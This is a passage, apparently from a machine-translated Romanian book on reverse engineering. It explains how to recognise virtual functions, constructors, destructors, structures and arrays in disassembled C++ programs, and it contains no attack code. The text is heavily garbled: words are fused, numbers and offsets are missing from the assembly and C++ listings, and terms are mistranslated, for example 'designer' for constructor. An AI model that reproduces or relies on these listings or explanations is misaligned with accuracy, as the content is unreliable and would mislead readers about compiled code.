principal+ ope;Demo clasa debază;Atenţie!Uite - funcția Demo este prezentă în program de două ori!;Prima dată când a intrat în obiectul clasei debază, iar a doua - în obiectul clasei;Derved, care a moștenit -o de la clasa de bază și a făcut o copie ;Prost, nu?Laurma urmei, ar fi mai bine dacă ar apela la original dar îl simplifică;Analiza programului Push OffsetAnonvirtualderi;"Demo derved non virtual \ n" Call Printf Pop Ecx Retn Base DEMO Endp getbase vtbl ProcAproape C df xref: main+ îp;Introducerea bazei bazei tabelului său virtual MOV EAH, ES MOV DWORD PTR [EAH], OFFSETBASE VTBL RETBL ENDP GETDERBED V PROC NER Cod xref: principal+ viteză tbl;Intrarea tabelului său virtual Push ESI MOVESI, ECX Call GetBase VTBL GPAVA Identificarea funcțiilor virtuale ;Da!Deci, obiectul nostru este un derivat dela bază!Mov dword ptr [ESI], offset derved vtbl;Intrarea indicatorului în tabelul virtual derved EAX, ESI POP ESIRETDERVED VTBL ENDP BASE VTBL DD OFFSET BASE DEMO Date xref: getbase vtbl+ viteză dd offse demo derved vtbl dd offsetderved demo;Date xref: getdederined vtbl+ viteză dd offseet derved demo ;Acordați atenție prezenței unui tabel virtualchiar și acolo unde nu este;Nevoie!Identificarea instrumentelor derivate ale funcțiilor Identificarea derivatelorfuncțiilor non -pline este un moment foarte subtil La prima vedere, întrucât sunt numite funcții c obișnuite, esteimposibil de recunoscut în ce notă sau acea funcție a fost anunțată-compilatorul distruge aceste informații chiar și înstadiul de compilare Desturi, dar nu toate!Înainte de fiecare apel al funcției (nu contează dacă derivatul sau nu) esteobligatoriu, se formează indicatorul acestui lucru - în cazul în care este necesar pentru a indica obiectul din care senumește această funcție Pentru derivate ale funcțiilor, acest indicator stochează deplasarea derivatului și nu obiectulde bază Iată un indiciu!Dacă funcția este numită cu diverse semne, aceasta este o funcție derivată Este mai dificil săafli din ce obiect provine Nu există soluții universale, dar dacă evidențiați obiectul A cu funcțiile fl (), f (), și obiectul b cu funcțiile fl (), f (), f () , Atunci putem spune în siguranță că funcția f () - derivată dinclasa A Adevărat, dacă funcția f () nu a fost niciodată chemată dintr -o copie a clasei, atunci nu va fi posibilădeterminarea dacă nu va fi derivată sau nu Luați în considerare un exemplu de identificare a derivatelor date în lista ;Listarea L Demonstrarea identificării derivatelor #include Clasa Base {public: void base demo (void){printf ("Demo de bază \ n");};Void base demo (void) {printf ("Demo de bază \ n");Clasa derved: public base {public:void derved demo (void) Partea III Identificarea structurilor cheie ale limbilor de nivel înalt imprimeu ("Demo derved \n");}; void derved demo (void) {printf ("Demo derved \ n"); rezultatul compilării acestui exemplu ar trebui să arateașa cum se arată în listarea PROC principal în apropiere; C DE XREF: START+AFJ, P PUSH ESI PUSH Apel? Fie un obiect un mov esi f eax;ESI = *Adăugați esp, mov ecx, eSI;Ecx = *a (această) bază de apel Demo;Numimbase demo, acordând atenție faptului că acest lucru indică mov ecx, esi,- esh = *a (this) apel base demo ;Apelațibase demo , acordând atenție faptului că acest lucru indică;' A' ​​ Apăsați apel? @yapaxi@z;Operator nou(UINT);Creăm o altă copie a unui anumit obiect, numim -o b Mov ESI, EAH;ESI = *B add esp, mov ecx, esi;Ecx = *b (this)apel base demo;AGA apelează la baza demo, dar de data aceasta acest lucru indică B ,;Aceasta înseamnă că base demo esteconectat prin rudenie cu „a” și cu „` mov ecx, eSI apelează base demo ;Da!Apelați base demo , dar de data aceastaacest lucru indică B ,;Aceasta înseamnă că base demo este conectat prin rudenie cu „a” și cu „b” mov ecx, eSI apeleazăderved demo;Apelați derved demo Indicatorul acest lucru indică B, și NU;Relațiile de familie derved demo c 'a' nu suntobservate Indicatorul acesta;Nu am indicat niciodată „A” atunci când apelează la Mov Ecx, ESI Call Derved Demo Capitolul Identificarea funcțiilor virtuale ;În mod similar Pop eSi Retn Main Endp Deci, identificareaderivatelor non -reversă ale funcțiilor este o afacere foarte reală Singura dificultate este de a distinge exemplare dindouă obiecte diferite de copii ale aceluiași obiect În ceea ce privește identificarea derivatelor cu funcții virtuale -acest lucru a fost deja descris anterior Derivatele funcției virtuale sunt cauzate în două etape - la prima în cazulobiectului, este introdusă deplasarea tabelului virtual al clasei de bază, iar apoi este înlocuită cu deplasareatabelului virtual al derivatului clasei Chiar dacă compilatorul optimizează codul, redundanța rămasă este încă mai multdecât suficientă pentru a distinge derivatele funcțiilor de restul Identificarea tabelelor virtuale acum, stăpânindcomplet tabelele și funcțiile virtuale, luați în considerare o întrebare foarte insidioasă - este orice serie de semnedin funcție, există un tabel virtual?Desigur nu!La urma urmei, o provocare indirectă a unei funcții printr -un indicatoreste o afacere frecventă în practica unui programator O serie de indicatori pe funcții hmm, desigur, nu o poți numitipic, dar acest lucru se găsește și în viață!Luați în considerare exemplul dat în lista Desigur, acest exemplueste strâmb și amuzat Cu toate acestea, pentru a demonstra situația în care gama de indicatori este vitală, ar trebui săscriu mai mult de o sută de linii de cod #include void demo l (void) {printf ("demo l \ n");} Void DEMO (void) {printf ("Demo \ n");} Void call demo (void ** x) {((void (*) (void)) x [ ]) () ();((Void (*) (void)) x [l]) ()();static void*x [ ] = {(void*) demo l, (void*) demo };// atenție: dacă tabloul nu este inițializat atunci când esteanunțat, // și în timpul programului, adică x [ ] = (void *) demo l, , // compilatorul generează un cod adecvat careintroduce / / deplasări funcții în timpul implementării programului, care va fi partea III Identificareastructurilor cheie ale limbilor de nivel înalt // Nu se uită deloc ca o masă virtuală!// Dimpotrivă, inițializareaatunci când anunțați -l plasează deja // indicatori gata -create în segmentul de date, arătând ca un tabel real //virtual (și salvarea tactului procesorului în plus) Call demo (& x [ ]);Și acum vom lua în considerare rezultatulcompilării acestui exemplu (listarea ) și vom verifica dacă putem distinge tabelul „om -fabricat” de indicatori dinprezent Listarea Rezultatul compilării unui exemplu care demonstrează imitația virtualului |Tabelele 'l;'-principalul proc din apropiere Cod xref: start+afj, p pushh offset like vtbl apel demon call;Da, funcția este transmisăindicatorului către ceva foarte similar cu;Tabel virtual Dar noi, deja înțelept prin experiență, cu ușurință;Am împărțitacest fals dur În primul rând, indicatorii de pe VTBL SO;Pur și simplu nu sunt transmise (nu există un astfel de codbanal) și, în al doilea rând, sunt;Se transmite nu prin stivă, ci prin registru În al treilea rând, indicatorul de pe;Untabel virtual nu este un compilator existent;Este utilizat direct, dar plasat într -un obiect Nu există nici nu existăchiar acolo;obiect, nici indicatorul acestui lucru Într -un cuvânt, acest lucru nu este virtual;masă, deși la primavedere este foarte mult pe ea;Similar ror ech retn principal endp demo call proc aproape Cod xref: sub + viteză arg = dword ptr ;Pointerul este un argument, iar tabelele virtuale sunt abordate;Prin registru push ebpmov ebp, esp push esi mov esi, [ebp+arg ] apel dword ptr [esi];Se produce un apel cu două niveluri ale funcției -conform indicatorului la tablou;indicatori ai funcției, care este caracteristică funcțiilor virtuale ;Dar, din nou, codprea banal, este un apel al funcțiilor virtuale;Asociat cu o mare redundanță și, în al doilea rând, nu există din nou unindicator;Acest apel DWORD PTR [ESI+ ];În mod similar - prea mult Doar pentru a apela funcția virtuală pop esi pop ebp retn demo call endp gpav Identificarea funcțiilor virtuale Like vtbl dd offset Demo l Date xref: principalul DD offset Demo ;Gama deindicatori arată ca un tabel virtual, dar;„Nu sunt localizate de obicei tabele virtuale, concluzii rezumate împrăștiateîn funcție de comentarii, repetăm ​​din nou principalele semne de„ falsuri ”: □ cod prea banal - cel puțin registreleutilizate și fără redundanță, apelul la tabele virtuale apare acolo unde ornamentul este mai mult sau mai mult decâtvirtualul virtual, funcția este introdusă în copia obiectului și este transmisă nu prin stivă, ci prin Register □ Nuexistă acest indicator, întotdeauna pregătit înainte de o funcție virtuală □ Funcțiile virtuale și variabilele staticesunt localizate în diferite locuri ale segmentului de date - prin urmare, se poate distinge imediat de altele Esteposibil să se organizeze un apel de apel de la link, astfel încât compilarea programului să ofere codul identic cuapelul funcției virtuale?Cum se spune teoretic da, dar practic - este cu greu posibil să se implementeze (șineintenționat - cu atât mai mult) Codul de apelare a funcțiilor virtuale datorită unei redundanțe mari este foartespecific și ușor de distins „prin ochi” Este ușor să simulați echipamentul general cu mese virtuale, dar fără inserțiide asamblare, este imposibil să le reproduceți exact În general, după cum vedem, lucrul cu funcții virtuale este asociatcu o redundanță deosebită și „frâne”, iar analiza lor este asociată cu costuri mari de forță de muncă - trebuie săpăstrați constant mulți indicatori în capul meu și să vă amintiți care dintre ele indică Dar, așa cum ar putea, numerită bariere fundamental insolubile pentru cercetător Pentru mai multe informații despre această problemă, consultațiCapitolul „Identificarea acestui lucru” Capitolul Identificarea proiectantului și a designerului distrugător(constructor), datorită apelului său automat la crearea unei noi instanțe a obiectului, este prima funcție obiectivă aobiectului Deci, ce dificultăți pot apărea în timpul identificării sale?Blocul de poticnire este că proiectantul esteopțional, adică poate fi prezent în obiect sau nu poate fi prezent Prin urmare, nu este deloc un fapt că prima funcțienumită va fi un designer!Analizând descrierea limbajului C ++, putem constata că proiectantul nu returnează niciun sens,ceea ce este necaracteristic pentru funcțiile obișnuite Cu toate acestea, această proprietate în sine nu este încă atâtde rară încât să identifice fără echivoc proiectantul Cum să fii atunci?Faptul că proiectantul nu ar trebui să provoaceautomat excepții de la standard ajută, chiar dacă memoria nu a fost luată sub obiect Această cerință poate fiimplementată în multe metode diferite, dar toți compilatorii cunoscuți au plasat pur și simplu un cec pentru un pointerzero înainte de a apela proiectantul, transferând controlul către el doar cu o alocare de memorie de succes pentruobiect Dimpotrivă, toate celelalte funcții ale obiectului sunt întotdeauna cauzate - chiar dacă nu reușești o încercarede a selecta memoria Mai degrabă, se face o încercare de a le numi, dar indicatorul zero din cauza erorii din memoriamemoriei, la prima încercare de a face apel, este o excepție, care transmite „frâiele guvernului” către procesorulexclusivului corespunzător situatie Astfel, funcția „a sunat” prin verificarea indicatorului zero este un constructor șinu altceva Teoretic, însă, o astfel de verificare poate fi prezentă atunci când apelați alte funcții care nu suntproiectanți, dar în viața reală această situație este extrem de rară Destructorul (distrugătorul), la fel ca designerul,este opțional, adică ultima funcție cauzată a obiectului nu va fi neapărat un distrugător Cu toate acestea, este foartesimplu să distingem distructorul de orice altă funcție - este cauzată doar cu crearea eficientă a unui obiect (adică,identificarea cu succes a memoriei) și nu este ignorată altfel Aceasta este o proprietate documentată a limbii, prinurmare, trebuie să fie implementată de toți compilatorii Astfel, același „inel” este plasat în cod ca designer, dar nuapare nicio confuzie, deoarece proiectantul este întotdeauna numit primul (dacă este cazul), iar distructorul esteultimul Un caz special reprezintă un obiect care este în întregime format dintr -un designer (sau distructor) - deși înaceastă situație este destul de posibil să ne dăm seama cu ce avem de -a face În spatele apelului proiectantului, existăaproape întotdeauna un cod care reia acest indicator în cazul unei identificări nereușite a memoriei, în timp cedistrugătorul nu are acest lucru!Mai departe-de obicei, distrugătorul nu este direct din procedura maternă, ci dincaracteristica funcției concrete, care, pe lângă distrugătorul și operatorul de ștergere, care eliberează eliberarea Utilizat de memoria obiectului Astfel, este destul de realist să distingem proiectantul de distrugător GPAVA Identificarea proiectantului și a distructorului ilustrează ceea ce s -a spus printr -un exemplu practic (listarea ) Listarea Demonstrarea proiectantului și a distrugătorului #include clasa myclass {public: myclass(void);Demo void (void);-Myclass (void);Myclass :: myclass () {printf ("constructor \ n");} Myclass :: ~ myclass (){printf ("distrugător \ n");} Void myclass :: demo (void) {printf ("myclass \ n");} Main () {myclass azzzz = newmyclass;Zzz-> demo ();Ștergeți zzz;Rezultatul compilării acestui exemplu în cazul general ar trebui să privească așa cumse arată în lista Listarea Rezultatul compilării exemplului dat în lista Constructor Proc înapropiere C DE XREF: Main+ p;Funcție de proiectare Faptul că acesta este tocmai proiectantul poate fiînțeles;implementarea apelului său PUSH ESI MOV ESI, ECX PUSH OFFSET ANDRUCTOR;„Constructor \ n” Call Printf Add Esp, MOV EAX, ESI POP ESI RETN CONSTRUCTOR ENDP DESTRUCTOR PROC C DE XREF: Destructor+ p Partea III Identificareastructurilor cheie ale limbilor de nivel ridicat;Funcția distrugătoare Faptul că acesta este tocmai din distructorulpoate fi înțeles;implementarea apelului său Push Call Pop Retn Destructo: Offset Adestructor printf Ecx R Endp;Demo„distrugător \ n” demo aproape;Cod xref: main+le> lp;Funcția obișnuită a amiclii de demo de demo de demo;„MyClass \ n”Call Printf Pop Ecx Retn Demo Endp Main Proc Near;Cod xref: start+afj Da, inițializată, -Nu numim designerul Mov DL, CL Partea III Identificareastructurilor cheie ale limbilor de nivel înalt mov ecx, offset unk el;Copia obiectului;Pregătiți indicatorulacesta sau dl, Al;Setați steagul de inițializare în True;și sunați la designerul mov byte e, dl;Steagul deinițializare al obiectului Constructor Call;Apelarea proiectantului ;Vă rugăm să rețineți că, dacă copia obiectului estedeja inițializată ,;(Vezi verificarea de mai sus) Nu este apelat proiectantul ;Astfel, este foarte ușor să identificați Push Offseet Thunk Destructo Call Atexit Add Esp, ;Transmitem funcția atexit către indicatorul de distrugere;pecare ar trebui să le sune la sfârșitul programului LOC D :;Cod xref: main+aîj mov ecx, offset unk el;Copiaobiectului;Pregătim indicatorul această demo JMP;Apelați demo endp principal thunk destructo : Date XREF: Main+ Viteză;Adaptor la funcția distrugătoare mov ecx, offset unk el;Copie a obiectului JMP Destructor Byte e db ;Date xref: Mainîr Main+ Viteză; Steagul de inițializare al unk EL DB ;Date xref: main+eîo main+ daper;O copie a obiectului este un cod similargenerează Borland C ++ Singura diferență este provocarea mai vicleană a distructorului Apelurile tuturor distructorilorsunt plasați într -o procedură specială care se dă afară că este de obicei localizată în fața funcțiilor bibliotecii(sau în imediata apropiere a acestora), deci este foarte ușor să o identificați Vedeți pentru dvs (listarea ) ■Listarea Rezultatul compilării unui exemplu care ilustrează identificarea proiectantului -■ și distrugereaobiectului global folosind Borland C ++ ' Main Proc în apropiere de compilator Date xref: date: j o push ebpmov ebp, esp cmp ds: byte , ;Steagul de inițializare al obiectului JNZ scurt LOC EC;Dacă obiectul a fostdeja inițializat, designerul nu se numește MOV EAX, Offse unk b ;O copie a obiectului GPAVA Identificareaproiectantului și a distrugătorului Call Constructor Inc DS: BYTE ;Steagulinițializării obiectului;Creștem steagul pe unitate, ridicându -l în adevărat S s :;C de xref: main+aîj mov eax,birou unk b ;Copie a obiectului demo de apel;Apelarea demo Xor eax, eax pop ebp retn main endp call destruct procaproape Date xref: date: a j-o;Această funcție conține provocările tuturor distructorilor obiectelorglobale;Deoarece apelul fiecărui distrugător este „înconjurat” prin verificarea steagului;Inițializare, această funcțieeste ușor de identificat - numai ea conține;Un cod similar (apelurile constructorilor sunt de obicei împrăștiați înîntregul program) Push ebp mov ebp, esp emp ds: byte , ;Steagul de inițializare al obiectului JZ scurtLOC ;Obiectul a fost inițializat?MOV EAX, OFFSET UNK B ;Copia obiectului;Pregătim indicatorul acest MovEdx, Call Distructor;Sunați la Destructor iOS : C DE XREF: CALL DESTRUCT+Aîj Pop Ebp Retn Call Destruct EndpVirtual Destructor Destructor poate fi, de asemenea, virtual!De ce nu?Acest lucru este util atunci când o copie a claseiderivate este eliminată prin pointer la obiectul de bază Deoarece funcțiile virtuale sunt asociate cu clasa obiectului,și nu cu clasa indicatorului, este cauzat un distrugător virtual asociat cu tipul de obiect, și nu cu tipul deindicator Cu toate acestea, aceste subtilități se referă la programarea directă, iar cercetătorii sunt interesați înprimul rând;Cum se identifică un distructor virtual Oh, este simplu - un distrugător virtual combină proprietățile unuidistrugător obișnuit și o funcție virtuală Designer virtual Designer virtual?!Și ce, există unul?Standard C ++ nuacceptă nimic de genul acesta Nu acceptă direct Și, atunci când proiectantul virtual necesită cu disperare programatori(cu toate acestea, acest lucru se întâmplă doar în cazuri foarte exotice), ei recurg la emulația manuală a unora dintreasemănările sale În VIR, alocate special în aceste scopuri, au fost luate în considerare în detaliu în capitolul ,„Identificarea funcțiilor virtuale” Partea a III -a Identificarea structurilor cheie ale limbilor lanivel înalt este următorul cod: Returnarea clasei de nume noi (*aceasta) este plasată Acest truc este mai curbat decâtun boomerang, dar funcționează Desigur, există și alte soluții Din păcate, discuția lor detaliată depășește cu multsfera acestei cărți și necesită o cunoaștere profundă a C ++ (mult mai profundă decât cea a unui dezvoltatorobișnuit) Deci, identificarea unui designer virtual din cauza lipsei unui concept în sine este, în principiu,imposibilă Emulația sa are zeci de soluții (dacă nu mai mult), al cărui transfer simplu este deja o problemă!Cu toateacestea, acest lucru nu este necesar - în majoritatea cazurilor, designerii virtuali sunt funcții virtuale care iau caargument indicele acestui lucru și returnând indicatorul la un nou obiect Nu este prea fiabil pentru identificare, darîncă mai bine decât nimic Designerul odată, designerul este doi obiectul poate avea mai mult de un designer (șifoarte des se întâmplă) Totuși, acest lucru nu afectează analiza Oricât de mulți designeri sunt prezenți - pentrufiecare instanță a obiectului, doar unul este numit întotdeauna, selectat de compilator în funcție de forma declarațieiobiectului Singurul detaliu - diverse exemplare ale obiectului pot provoca diverși designeri - fiți atenți!Designerulgol Unele restricții asupra proiectantului (în special, absența valorii returnate) au dus la apariția stilului deprogramare „designer gol” Proiectantul este lăsat intenționat gol, iar întregul cod de inițializare este plasat într -ofuncție specială de membru, De regulă, numit init Discuția despre punctele forte și punctele slabe ale acestui stil este subiectul unei conversațiiseparate care depășește această carte Este suficient pentru cercetători să știe că există un astfel de stil și că esteutilizat activ nu numai de programatori individuali, ci și de cele mai mari companii gigantice (de exemplu, acelașiMicrosoft) Prin urmare, după ce a întâlnit un apel al unui designer gol - nu fiți surprinși - acest lucru este normal șicăutați funcția de inițializare între membrii obișnuiți Capitolul Identificarea obiectelor, structurilor șitablourilor Reprezentarea internă a obiectelor este foarte similară cu reprezentarea structurilor în limbajul C (îngeneral, obiectele sunt structuri), astfel încât vom lua în considerare identificarea lor într -un singurcapitol Identificarea structurilor structurii este foarte populară în rândul programatorilor - permițându -vă săcombinați „de sub„ date de familie ”sub un singur acoperiș, acestea fac ca listarea programului să fie mai vizuală,simplificând înțelegerea acestuia În consecință, identificarea structurilor în timpul DizAssMitting facilitează analizacodului Din păcate, cercetătorii, structurile ca atare există doar în textul inițial al programului și sunt aproapecomplet „măcinate” în timpul compilării sale, devenind indistinguibile de obișnuit, în niciun fel legate între ele Luațiîn considerare un exemplu dat în lista Odihnind Un exemplu care demonstrează distrugerea structurilor în etapade compilare #include #include structura zzz {char so [ ];int a;Plutitor f;Func (struct zzz y) //Este clar că structura structurii este mai bine de evitat prin sens, // dar aici se face intenționat pentru a demonstracreația ascunsă // variabilă locală {printf (" %s %x %f \ n", & U SO [ ], U A , Y F);Main () {struct zzz u;strcpy (&y so [ ], "salut, marinar ");U A = x ;Y f = ;Func (y); Partea a III -a Identificareastructurilor cheie ale limbilor de nivel înalt Rezultatul compilării în lista în cazul general ar trebui săprivească așa cum se arată în lista :;Listarea Rezultatul compilării exemplului;dat în lista Principalul proc înapropiere Cod xref: start+afj -p var = byte ptr - h var = dword ptr - var = dword ptr - ;Membrii structuriisunt indistinguibile de la variabilele locale obișnuite împing ebp mov ebp, esp sub esp, h;Rezervarea locului în stivăpentru împingerea eSi Push edi Push Offeset Ahellosailor;"Bună ziua, Sailor " Lea EAX, [EBP+VAR ];Indicatorul cătrevariabila locală VAR ;Următoarea variabilă din spatele ei este localizată în funcție de deplasarea de ;Prin urmare, x - x = x -șaisprezece bytes-exact la fel de mult;Ocupează ѵAG , care sugerează că este o linie Push Ex CallStrcpy;copierea unei linii din segmentul de date într-un membru variabil local;structuri Adăugați ESP, MOV[EBP+VAR ], H;Introducerea unui tip de tip DWORD x MOV [EBP+VAR ], D H;Această valoare în format floateste de , sub esp, h;Rezervăm un loc pentru o variabilă locală ascunsă, care;Este utilizat de un compilator pentrua transmite funcția structurii structurii;De valoare Mov Ech, ; cuvinte duble vor fi copiate, adică de octeți; -pe o linie și patru pe float și intesi ESI, [EBP+VAR ];Obținem un pointer la structura copiat copiat mai detaliat încapitolul , „Identificarea literalelor și liniilor” Mai multe detalii vor fi discutate în mai mult decât în​​capitolul , „Identificarea argumentelor funcțiilor” Mai multe informații despre această problemă pot fi găsite încapitolul , „Identificarea registrului și a variabilelor temporare” GPAVA Identificarea obiectelor, structurilorși tablourilor MOV EDI, ESP;Obținem un pointer la noua repere a variabilei locale, recent creată, RepeMOVSD;Copie!Sunați FUNC;Apelați o funcție ;Transmiterea indicatorului către o variabilă locală ascunsă nu are loc -;Eaeste deja în vârful stivei Adăugați ESP, H Pop EDI Pop ESI Rrov ESP, EBP POP EBP Retn Main Endp și acum vom înlocuistructura cu un anunț secvențial al acelorași variabile ( listare) Listarea Un exemplu care demonstreazăasemănarea structurilor cu principalul local obișnuit () char so [ ];int a;Plutitor f;Strcpy (& deci [ ], "Hello,Sailor ");A = x ;F = , ;Rezultatul compilării acestui exemplu este prezentat în lista Comparați această listăcu rezultatul prezentat în lista Principalul proc în apropiere C de xref: start+afj -p var = dword ptr - hvar = byte ptr - h var = dword ptr ~ ;Da, se pare, există o diferență cu adevărat, variabile locale;plasate înstivă nu în ordinea în care au fost declarați;Programul, dar modul în care compilatorul a dorit acest lucru Dimpotrivă,membrii structurii;Asigurați -vă că vă încadrați în ordinea anunțului lor ;Dar, de când, cu Dezasambla, ordinea inițială;Variabilele nu sunt cunoscute dacă vor determina „corect” dacă sunt localizate sau nu ,;Dinpăcate, nu este posibil PUSH EBP MOV EBP, ESP Sub esp, h Partea III Identificarea structurilor cheie ale limbilorde nivel ridicat;Rezervăm x Byte Stack (precum și exemplul anterior) Push ofset ahellosailor;"Hello, Sailor" Lea EAX,[EBP+VAR ] PUSH EAX CALL STRCPY ADD ESP, MOV [EBP+VAR ], H MOV [EBP+VAR ], D H;Vezi: Codul coincide cuatenție octetul în BYT , prin urmare ,;Este imposibil să distingem automat structura de un cluster simplu;variabilelocale Mov Esp, EBP pop ebp retn principal funk proc în apropiere;Cod xref: principal+ viteză var = QWORD PTR - arg = byte ptr arg = dword ptr h arg = dword ptr lch;Vezi: Deși funcțiile sunt transmise doar un argument -o copie;Structuri - În textul Dizassembler, este indistinguibil de consecventă;Doarme în stiva de mai multe variabilelocale!Prin urmare, restaurați;Prototipul autentic al funcției este imposibil push ebp mov ebp, esp fld[ebp+arg ];Încărcați materialul întreg, care este în funcție de deplasare; x în raport cu indicatorul EAX Sub esp, ;Rezervați octeți variabile locale Fstp [esp+ +var ];Transmite o chestiune de valoare materială individualăvariabilei locale MOV EAX, [EBP+Arg ] Push EAH;Citiți doar variabila materialului „transmis”;Și împinge -l înstivă Lea Ecx, [EBP+arg ];Obțineți un indicator pentru primul argument PUSN ECX Push Offset ASXF;" %S %x %f \ n" CallPrintf Adăugare esp, H ebp ebp retn func endp capitolul Identificarea obiectelor, structurilor și tablourilor nu este posibilă distingerea structurii de variabileleobișnuite?Cercetătorul va trebui să recunoască în mod independent „rudenia” datelor, uneori greșită și reproducândinexact textul original al programului? Cum se spune și da, și nu în același timp „Da”: o copie a lui structurafolosită în aceeași unitate de difuzare în care a fost declarată, „se desfășoară” în stadiul compilării în variabileindependente, apelul la care se întâmplă individual la adresele lor reale (eventual relativ) „Nu” - Dacă există Unsingur indicator la instanța structurii în domeniul vizibilității Apoi, apelul către toți membrii structurii pe care oare loc prin pointerul acestei copii a structurii (deoarece structura nu este prezentă în domeniul vizibilității, deexemplu , o altă funcție este transmisă de legătura, este imposibil să se calculeze adresele reale ale membrilor săi înfaza de compilare) Așteptați, dar la fel ca acesta este apelul la elementele tabloului, - indicatorul de bază indicăînceputul lui Limba, deplasarea elementului dorit în raport cu începutul tablouluiA (indicele elementului înmulțit cudimensiunea sa) Rezultatul calculelor va fi indicatorul real al elementului dorit!Singura diferență fundamentală întretablouri și structuri este că tablourile sunt omogene (adică constau din elemente de același tip), iar structurile potfi la fel de omogene, ca eterogene (constând din elemente de diferite tipuri) Astfel, sarcina de a identificastructurile și tablourile este redusă: în primul rând, la alocarea celulelor de memorie abordate prin indicatorul debază comun tuturor și, în al doilea rând, pentru a determina tipul acestor variabile Dacă reușiți să evidențiați maimult de un tip - cel mai probabil structura are înaintea noastră, altfel poate fi atât o structură, cât și un tablou cusucces egal - aici trebuie să vă uitați în circumstanțe Pe de altă parte, dacă programatorul se gândește să calculezedependența cafelei beat în ziua săptămânii, el poate aloca pentru contabilizarea fie a zilei de zi [ ], fie poate începestructura Struct Week {int luni;int marți; } Și într -un alt caz, codul generat de compilare va fi același, dar nunumai codul, ci și sensul!În acest context, structura nu se distinge de tablou atât fizic, cât și logic, iar alegereaunei anumite structuri este o chestiune de gust Rețineți că tablourile sunt de obicei lungi, iar apelul la elementelelor este adesea însoțit de diverse operații matematice efectuate deasupra indicatorului În plus - prelucrareaelementelor de matrice, de regulă, este realizată în ciclu, iar membrii structurii, ca de obicei, sunt „versiți”individual (deși unii programatori își permit libertățile de a gestiona structura ca tablou) Este și mai neplăcut faptulcă C/C ++ este permis (dacă nu să spună - provoacă) o transformare clară a tipurilor În acest caz, în timpulDizAssMitting, nu este posibil să se stabilească dacă avem de -a face cu „sub un singur acoperiș”, combinate cu date detip diferite (adică structura), sau aceasta este un tablou, cu o transformare „manuală” a tipului de tip de tip de tipelementele sale Deşi, Strict vorbind, după astfel de transformări, tabloul se transformă într -o structură reală!(Matricea prin definițiaomogenensenului nu poate fi stocată, iar datele nu pot fi stocate ) Modificăm exemplul anterior transmitând funcțiile nustructura ca atare, ci indicatorul către acesta și vom vedea ce a generat compilatorul pentru cod (Listarea ) 'Listarea Rezultatul compilării unui exemplu modificat (vezi Lista ) ,;În care funcțiile nu sunttransmise de structura în sine, ci indicatorul către acesta se concentrează în apropiere Cod xref: sub + pvar = QWORD PTR arg = DWORD PTR ;AGA Funcția ia un singur argument Push EBP ParteaIII Identificarea structurilor cheie ale limbilor de nivel înalt Mov EBP, ESP MOV EAX, [EBP+arg ];Încărcăm funcțiiletransmise ale argumentului în EAX FLD DWORD PTR [EAX+ H];Încărcăm valoarea materială a deplasării în stiva FPU; x înraport cu indicatorul EAX ;Astfel, în primul rând, EAX (argument, funcții transmise) este;Pointerul, în al doilea rând,nu este doar un indicator, ci un indicator de bază ,;Folosit pentru a accesa elemente de structură sau tablou ;Amintiți-vă tipul primului element (valoarea materialului) și continuați;analiză Sub esp, ;Rezervăm octeți pentru variabilelocale Fstp [esp+ +var ];Transmitem o chestiune de valoare materială individuală variabilei locale ѵAG Mov ecx,[ebp+arg ];Încărcăm valoarea funcției transmise a indicatorului din ECH Mov edx, [ECX+LOH];Încărcăm în valoarea EDXcare se află în funcție de deplasarea x ;Da!În mod clar, aceasta nu este o semnificație materială, prin urmare, avemde -a face;cu o structură Împingeți edx;Îi împingem pe singurul din stivă Mov eax, [ebp+arg ] push eah;Primim unindicator către structură (adică primul său membru);Și o umple în stivă De la cel mai apropiat element;este localizat înfuncție de deplasarea x , apoi primul element al structurii, aparent ,;Ocupă toți acești octeți x , deși acest lucrunu este neapărat - poate;Membrii rămași ai structurii nu sunt pur și simplu folosiți Instalați ca toți ceilalți;De fapt,puteți, apelul la apel (matern);funcții care inițializau această structură, dar fără asta;Putem restabili aspectul săuaproximativ;struct xxx (; char x [ x ] ii int x [ ] || intl [ ] || int [ ]; in ;;;; ; o linie de specificatorivă permite să clarificați tipurile de date - deci, primul; acest element este, fără îndoială, Char X [x ], deoareceeste afișat ca; un șir, prin urmare, presupunerea noastră preliminară de format; structura este adevărată! Call PrintfAdăugare ESP, H POP EBP RETN GPAVA Identificarea obiectelor, structurilor și tablourilor Funct Endp Min ProcNear C DE XREF: START+AF> LP VAR - BYTE PTR H VAR - DWORD PTR VAR = DWORD PTR - ; Vezi: La prima vedere;vezi: La prima vedere avem de -a face cu mai multe locale; variabile, dar să nu ne grăbim cu identificarea lor! Pushhebp mov ebp, esp sub esp, h; deschideți friptura de offset ahellosailor; "Bună ziua, marinar!" Lea eax, [EBP+VAR ]PUSH EAX CALL UNUNKSKN LIBNAME L; Unknow libmane este strcpy și puteți înțelege acest lucru fără a analiza nici măcar;funcția sa ia două argomeNTA - un indicator pentru un tampon local;de la x octeți (dimensiunea x a fost obținutăprin scăderea celei mai apropiate deplasare; variabilă din deplasarea acestei variabile în raport cu cardul; Stack;același prototip precis are și StrCMP, dar acest lucru nu poate fi; Strcmp, deoarece tamponul local nu este inițializatăși poate; doar un tampon de receptor Adăugați esp, ; turnați argumentele din stivă MOV [EBP+VAR ], H;inițializați variabila locală ѵAG tip DWORD MOV [EBP+VAR ], D H; inițializați Variabila locală ѵAG Tip Nu,nu DWORD; (deși arată ca DWORD), - După analizarea modului în care această variabilă este utilizată în funcțiilefuncției, pe care o transmite, recunoaștem; are o valoare materială de Bytes Deci este float Lea yesh,[ebp+var ] push esh; acum - cel mai important lucru! Funcțiile sunt transmise către local; variabil ѵag , - untampon de șir de x octeți ,; dar analiza numită numită funcția a făcut posibilă stabilirea faptului că este abordată;nu numai la primul x octeți ai stivei funcției mamei și pentru toți -; x ”Prin urmare, funcțiile nu sunt transmisela șir;tampon și un indicator la structură ;srtuct x {;Char ѵag [ ];;int var ;;Float var ;} Această problemă va fidiscutată mai detaliat în capitolul , „Identificarea argumentelor funcțiilor” partea a III-a Identificarea structurilor cheie ale limbilor de nivel ridicat;Deoarece tipurile de date sunt diferite, aceasta estetocmai structura, nu;matrice Apelați Funct Add ESP, MOV ESP, EBP POP EBP Retn Sub Endp Identificare Obiectele Obiectele limbajului C ++ sunt, de fapt, o structură, o structură care combină date, metode pentru procesarealor (adică funcții) și atribute de protecție (de exemplu, public, tras etc ) Datele elementelor obiectului suntprocesate de compilator în același mod ca și membrii obișnuiți ai structurii Funcțiile nevirtuale sunt cauzate dedeplasarea efectivă și sunt absente în obiect Funcțiile virtuale sunt chemate printr -un indicator special către untabel virtual plasat într -un obiect, iar atributele de protecție sunt distruse în stadiul de compilare Este posibil sădistingem o funcție publică de protejată doar 